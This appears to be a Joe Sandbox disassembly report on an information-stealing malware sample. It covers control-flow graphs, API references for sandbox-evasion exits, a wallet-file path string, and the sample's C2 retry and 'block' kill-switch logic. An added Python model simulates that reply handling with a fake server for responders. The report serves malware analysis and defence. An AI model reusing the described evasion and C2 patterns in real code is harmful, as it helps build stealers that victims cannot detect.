                                  control_flow_graph 1090 715760-7157c7 call 715d20 call 71ab30 * 3 call 71aa50 * 4 1106 7157cc-7157d3 1090->1106 1107 7157d5-715806 call 71ab30 call 71aab0 call 701590 call 715440 1106->1107 1108 715827-71589c call 71aa50 * 2 call 701590 call 715510 call 71abb0 call 71ab10 call 71ade0 StrCmpCA 1106->1108 1124 71580b-715822 call 71abb0 call 71ab10 1107->1124 1133 7158e3-7158f9 call 71ade0 StrCmpCA 1108->1133 1138 71589e-7158de call 71aab0 call 701590 call 715440 call 71abb0 call 71ab10 1108->1138 1124->1133 1140 715a2c-715a94 call 71abb0 call 71ab30 * 2 call 7016b0 call 71ab10 * 4 call 701670 call 701550 1133->1140 1141 7158ff-715906 1133->1141 1138->1133 1270 715d13-715d16 1140->1270 1144 715a2a-715aaf call 71ade0 StrCmpCA 1141->1144 1145 71590c-715913 1141->1145 1164 715be1-715c49 call 71abb0 call 71ab30 * 2 call 7016b0 call 71ab10 * 4 call 701670 call 701550 1144->1164 1165 715ab5-715abc 1144->1165 1149 715915-715969 call 71ab30 call 71aab0 call 701590 call 715440 call 71abb0 call 71ab10 1145->1149 1150 71596e-7159e3 call 71aa50 * 2 call 701590 call 715510 call 71abb0 call 71ab10 call 71ade0 StrCmpCA 1145->1150 1149->1144 1150->1144 1250 7159e5-715a25 call 71aab0 call 701590 call 715440 call 71abb0 call 71ab10 1150->1250 1164->1270 1171 715ac2-715ac9 1165->1171 1172 715bdf-715c64 call 71ade0 StrCmpCA 1165->1172 1180 715b23-715b98 call 71aa50 * 2 call 701590 call 715510 call 71abb0 call 71ab10 call 71ade0 StrCmpCA 1171->1180 1181 715acb-715b1e call 71ab30 call 71aab0 call 701590 call 715440 call 71abb0 call 71ab10 1171->1181 1201 715c66-715c71 Sleep 1172->1201 1202 715c78-715ce1 call 71abb0 call 71ab30 * 2 call 7016b0 call 71ab10 * 4 call 701670 call 701550 1172->1202 1180->1172 1275 715b9a-715bda call 71aab0 call 701590 call 715440 call 71abb0 call 71ab10 1180->1275 1181->1172 1201->1106 1202->1270 1250->1144 1275->1172
                                  APIs
                                    • Part of subcall function 0071AB30: lstrlen.KERNEL32(00704F55,?,?,00704F55,00720DDF), ref: 0071AB3B
                                    • Part of subcall function 0071AB30: lstrcpy.KERNEL32(00720DDF,00000000), ref: 0071AB95
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00715894
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007158F1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00715AA7
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 00715440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00715478
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 00715510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00715568
                                    • Part of subcall function 00715510: lstrlen.KERNEL32(00000000), ref: 0071557F
                                    • Part of subcall function 00715510: StrStrA.SHLWAPI(00000000,00000000), ref: 007155B4
                                    • Part of subcall function 00715510: lstrlen.KERNEL32(00000000), ref: 007155D3
                                    • Part of subcall function 00715510: lstrlen.KERNEL32(00000000), ref: 007155FE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007159DB
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00715B90
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00715C5C
                                  • Sleep.KERNEL32(0000EA60), ref: 00715C6B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: e7a4dabf0c078248723996ee8a42160119719765e104ee258d8ea069f2aafa7e
                                  • Instruction ID: 874d0dddf22eeb2bc2a7b1f273056598e9b1493dee79ab0c5502038a63e0f0e9
                                  • Opcode Fuzzy Hash: e7a4dabf0c078248723996ee8a42160119719765e104ee258d8ea069f2aafa7e
                                  • Instruction Fuzzy Hash: 40E17871A55104EACB18FBA8ECABDED737DAF54310F408558F506660D1EF386B88CB62

                                  Control-flow Graph

                                  control_flow_graph 1301 7119f0-711a1d call 71ade0 StrCmpCA 1304 711a27-711a41 call 71ade0 1301->1304 1305 711a1f-711a21 ExitProcess 1301->1305 1309 711a44-711a48 1304->1309 1310 711c12-711c1d call 71ab10 1309->1310 1311 711a4e-711a61 1309->1311 1313 711a67-711a6a 1311->1313 1314 711bee-711c0d 1311->1314 1316 711a71-711a80 call 71ab30 1313->1316 1317 711a99-711aa8 call 71ab30 1313->1317 1318 711afd-711b0e StrCmpCA 1313->1318 1319 711b1f-711b30 StrCmpCA 1313->1319 1320 711bdf-711be9 call 71ab30 1313->1320 1321 711b41-711b52 StrCmpCA 1313->1321 1322 711ba1-711bb2 StrCmpCA 1313->1322 1323 711bc0-711bd1 StrCmpCA 1313->1323 1324 711b63-711b74 StrCmpCA 1313->1324 1325 711b82-711b93 StrCmpCA 1313->1325 1326 711a85-711a94 call 71ab30 1313->1326 1327 711aad-711abe StrCmpCA 1313->1327 1328 711acf-711ae0 StrCmpCA 1313->1328 1314->1309 1316->1314 1317->1314 1336 711b10-711b13 1318->1336 1337 711b1a 1318->1337 1338 711b32-711b35 1319->1338 1339 711b3c 1319->1339 1320->1314 1340 711b54-711b57 1321->1340 1341 711b5e 1321->1341 1346 711bb4-711bb7 1322->1346 1347 711bbe 1322->1347 1349 711bd3-711bd6 1323->1349 1350 711bdd 1323->1350 1342 711b80 1324->1342 1343 711b76-711b79 1324->1343 1344 711b95-711b98 1325->1344 1345 711b9f 1325->1345 1326->1314 1332 711ac0-711ac3 1327->1332 1333 711aca 1327->1333 1334 711ae2-711aec 1328->1334 1335 711aee-711af1 1328->1335 1332->1333 1333->1314 1354 711af8 1334->1354 1335->1354 1336->1337 1337->1314 1338->1339 1339->1314 1340->1341 1341->1314 1342->1314 1343->1342 1344->1345 1345->1314 1346->1347 1347->1314 1349->1350 1350->1314 1354->1314
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00711A15
                                  • ExitProcess.KERNEL32 ref: 00711A21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: b9c9fe9c1e5f698e64bd9b836d91de584d1be9020f5abec690de04f104ec1092
                                  • Instruction ID: 1e4f630a6e1307e2e9a8d43c58d49ab32147cda37128eb2d5b7938accf80bbd4
                                  • Opcode Fuzzy Hash: b9c9fe9c1e5f698e64bd9b836d91de584d1be9020f5abec690de04f104ec1092
                                  • Instruction Fuzzy Hash: 525153B4B4E109EFCB14DFD8D954AEE77B9EF44304F508049E611AB281E778E980DB61
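The two function records above fix how the sample treats what the C2 sends back: in the loop at 715760 every StrCmpCA is against "ERROR", the only Sleep (0xEA60, 60 000 ms) sits in the block reached from that comparison, and that block's edge goes back to the loop head (1201->1106); in the function at 7119f0 the StrCmpCA against "block" is followed directly by ExitProcess. The model below is an added example written for this report to let a responder or sinkhole author exercise those paths; it is not code from the sample, from the Stealc family, or from Joe Sandbox. Everything it takes from the page is the chunked InternetReadFile loop (0x7CF bytes per read), the 60 s retry on "ERROR" and the exit on "block". Assumptions, marked in the code: that the `"` and `------` strings in the request function are a multipart/form-data boundary and that the body is laid out as below, that any reply other than "ERROR" or "block" counts as success, and the field name `hwid`, which is made up.

```python
"""Model of the C2 reply handling seen in the functions at 0x715760 and 0x7119f0.

Added example for this report; not code from the sample or from Joe Sandbox.
Grounded in the report: replies are read in 0x7CF-byte InternetReadFile chunks
(0x704E99); the loop at 0x715760 compares replies to "ERROR" and the only path
through Sleep(0xEA60) leads back to the loop head; the function at 0x7119f0
calls ExitProcess right after StrCmpCA(reply, "block").
Assumed (not on the page): the multipart body layout, and that any other reply
is a success.
"""
import io
import time

RETRY_DELAY_MS = 0xEA60   # Sleep argument at 0x715C6B: 60 000 ms
READ_CHUNK = 0x7CF        # InternetReadFile size at 0x704E99: 1999 bytes
BOUNDARY = b"------"      # "------" strings in the request function; assumed to be the boundary


class KillSwitch(Exception):
    """Stands in for the ExitProcess call taken on a "block" reply."""


def build_multipart(fields):
    """Assumed request layout: one form-data part per field, boundary "------"."""
    body = bytearray()
    for name, value in fields.items():
        body += b"--" + BOUNDARY + b"\r\n"
        body += b'Content-Disposition: form-data; name="' + name.encode() + b'"\r\n\r\n'
        body += value.encode() + b"\r\n"
    body += b"--" + BOUNDARY + b"--\r\n"
    return bytes(body)


def read_reply(stream, chunk=READ_CHUNK):
    """Mirror of the InternetReadFile loop (0x704e82): read until an empty read."""
    out = bytearray()
    while buf := stream.read(chunk):
        out += buf
    return bytes(out)


class C2Session:
    """Drives one request until the C2 answers something other than "ERROR"."""

    def __init__(self, transport, sleep=time.sleep, max_retries=None):
        self.transport = transport      # callable(body) -> file-like reply stream
        self.sleep = sleep              # injectable so tests do not wait 60 s
        self.max_retries = max_retries  # the sample has no limit; tests need one
        self.retries = 0

    def exchange(self, fields):
        while True:
            reply = read_reply(self.transport(build_multipart(fields)))
            if reply == b"block":           # StrCmpCA(reply, "block") -> ExitProcess
                raise KillSwitch("C2 sent block")
            if reply != b"ERROR":           # assumption: anything else is success
                return reply
            if self.max_retries is not None and self.retries >= self.max_retries:
                raise RuntimeError("C2 kept answering ERROR")
            self.retries += 1
            self.sleep(RETRY_DELAY_MS / 1000)   # Sleep(0xEA60), then back to the loop head


class ScriptedC2:
    """Fake server for the model: answers a fixed list of replies in order."""

    def __init__(self, replies):
        self.replies = list(replies)
        self.bodies = []                # every body the "sample" sent, for inspection

    def __call__(self, body):
        self.bodies.append(body)
        return io.BytesIO(self.replies.pop(0) if self.replies else b"ERROR")


def run_demo(replies, fields=None):
    """Return (outcome, retries, seconds slept) for a scripted reply sequence."""
    slept = []
    session = C2Session(ScriptedC2(replies), sleep=slept.append, max_retries=5)
    try:
        outcome = session.exchange(fields or {"hwid": "constructed-sample"})
    except KillSwitch:
        outcome = b"<ExitProcess>"
    return outcome, session.retries, sum(slept)


if __name__ == "__main__":
    print(run_demo([b"ERROR", b"ERROR", b"config-blob"]))   # two 60 s waits, then success
    print(run_demo([b"block"]))                              # immediate exit
```

The practical use is the inverse of the model: a responder that answers `block` makes the process exit at the first round trip, while one that answers `ERROR` keeps it parked in 60 s sleeps, which is the cheapest way to hold an instance idle for memory capture without letting it reach the later stages of the loop.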

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0E18), ref: 00719BF1
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0D10), ref: 00719C0A
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0E30), ref: 00719C22
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0ED8), ref: 00719C3A
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0D28), ref: 00719C53
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D9160), ref: 00719C6B
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011C5320), ref: 00719C83
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011C5480), ref: 00719C9C
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0D40), ref: 00719CB4
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0DA0), ref: 00719CCC
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0EC0), ref: 00719CE5
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0F38), ref: 00719CFD
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011C5340), ref: 00719D15
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0DB8), ref: 00719D2E
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 007011D0: ExitProcess.KERNEL32 ref: 00701211
                                    • Part of subcall function 00701160: GetSystemInfo.KERNEL32(?), ref: 0070116A
                                    • Part of subcall function 00701160: ExitProcess.KERNEL32 ref: 0070117E
                                    • Part of subcall function 00701110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0070112B
                                    • Part of subcall function 00701110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00701132
                                    • Part of subcall function 00701110: ExitProcess.KERNEL32 ref: 00701143
                                    • Part of subcall function 00701220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0070123E
                                    • Part of subcall function 00701220: __aulldiv.LIBCMT ref: 00701258
                                    • Part of subcall function 00701220: __aulldiv.LIBCMT ref: 00701266
                                    • Part of subcall function 00701220: ExitProcess.KERNEL32 ref: 00701294
                                    • Part of subcall function 00716A10: GetUserDefaultLangID.KERNEL32 ref: 00716A14
                                    • Part of subcall function 00701190: ExitProcess.KERNEL32 ref: 007011C6
                                    • Part of subcall function 007179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007011B7), ref: 00717A10
                                    • Part of subcall function 007179E0: RtlAllocateHeap.NTDLL(00000000), ref: 00717A17
                                    • Part of subcall function 007179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00717A2F
                                    • Part of subcall function 00717A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00717AA0
                                    • Part of subcall function 00717A70: RtlAllocateHeap.NTDLL(00000000), ref: 00717AA7
                                    • Part of subcall function 00717A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00717ABF
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011D9250,?,007210F4,?,00000000,?,007210F8,?,00000000,00720AF3), ref: 00716D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00716D88
                                  • CloseHandle.KERNEL32(00000000), ref: 00716D99
                                  • Sleep.KERNEL32(00001770), ref: 00716DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,011D9250,?,007210F4,?,00000000,?,007210F8,?,00000000,00720AF3), ref: 00716DBA
                                  • ExitProcess.KERNEL32 ref: 00716DC2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2525456742-0
                                  • Opcode ID: 9fc1921aa5a3fbb3138b344c0ccee01589d8c6c98a87b3bf4a45ea5f1c477c80
                                  • Instruction ID: 6f1d80ce845fae6e297aadbd8c9306c0b783d9194c63466e743fe5513b1a219e
                                  • Opcode Fuzzy Hash: 9fc1921aa5a3fbb3138b344c0ccee01589d8c6c98a87b3bf4a45ea5f1c477c80
                                  • Instruction Fuzzy Hash: DE317071A59108EBCB04FBF8EC5EAFE7379AF04310F404519F112621C1DF786985C662

                                   Control-flow Graph (text form: node id, address range, calls made in the block; the executed/not-executed colouring of the image is not preserved)
                                   • 1436: 701220-701247, call 718b40, GlobalMemoryStatusEx
                                   • 1439: 701273-70127a
                                   • 1440: 701249-701271, call 71dd30 * 2
                                   • 1442: 701281-701285
                                   • 1444: 701287
                                   • 1445: 70129a-70129d
                                   • 1447: 701292-701294, ExitProcess
                                   • 1448: 701289-701290
                                   • Edges: 1436->1439, 1436->1440, 1439->1442, 1440->1442, 1442->1444, 1442->1445, 1444->1447, 1444->1448, 1448->1445, 1448->1447
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0070123E
                                  • __aulldiv.LIBCMT ref: 00701258
                                  • __aulldiv.LIBCMT ref: 00701266
                                  • ExitProcess.KERNEL32 ref: 00701294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: 8b229fab7d81f8bee19570151bdea8943b7742a160d2916dee985f5870279e8f
                                  • Instruction ID: 0a4602b23d5cda440931c75542e342162afb8183be5a7878f4bfe44236e49126
                                  • Opcode Fuzzy Hash: 8b229fab7d81f8bee19570151bdea8943b7742a160d2916dee985f5870279e8f
                                  • Instruction Fuzzy Hash: 3D0162F0E44308FADB10DFD4DC49B9DB7B8BB14705F504549E604B61C0D6B855818B59

                                   Control-flow Graph (text form: node id, address range, calls made in the block; the executed/not-executed colouring of the image is not preserved)
                                   • 1450: 716d93
                                   • 1451: 716daa
                                   • 1453: 716d5a-716d77, call 71ade0, OpenEventA
                                   • 1454: 716dac-716dc2, call 716bc0, call 715d60, CloseHandle, ExitProcess
                                   • 1459: 716d95-716da4, CloseHandle, Sleep
                                   • 1460: 716d79-716d91, call 71ade0, CreateEventA
                                   • Edges: 1450->1451, 1451->1453, 1451->1454, 1453->1459, 1453->1460, 1459->1451, 1460->1454
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011D9250,?,007210F4,?,00000000,?,007210F8,?,00000000,00720AF3), ref: 00716D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00716D88
                                  • CloseHandle.KERNEL32(00000000), ref: 00716D99
                                  • Sleep.KERNEL32(00001770), ref: 00716DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,011D9250,?,007210F4,?,00000000,?,007210F8,?,00000000,00720AF3), ref: 00716DBA
                                  • ExitProcess.KERNEL32 ref: 00716DC2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 1bacfb7c294475ac47ad773a1a41de5c1faa7bd1f43a7534dc8ca8fc2945ca56
                                  • Instruction ID: 41e3f36a6f5a6ac1e9f1192d32ebed3d4d6166f9c26859ec5b4b628589f6848a
                                  • Opcode Fuzzy Hash: 1bacfb7c294475ac47ad773a1a41de5c1faa7bd1f43a7534dc8ca8fc2945ca56
                                  • Instruction Fuzzy Hash: 2DF05E30B8C219EBEF14ABE4EC0ABFDB374AF14B01F100616B552A51D4DBB855C0DA61

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00704889
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00704899
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
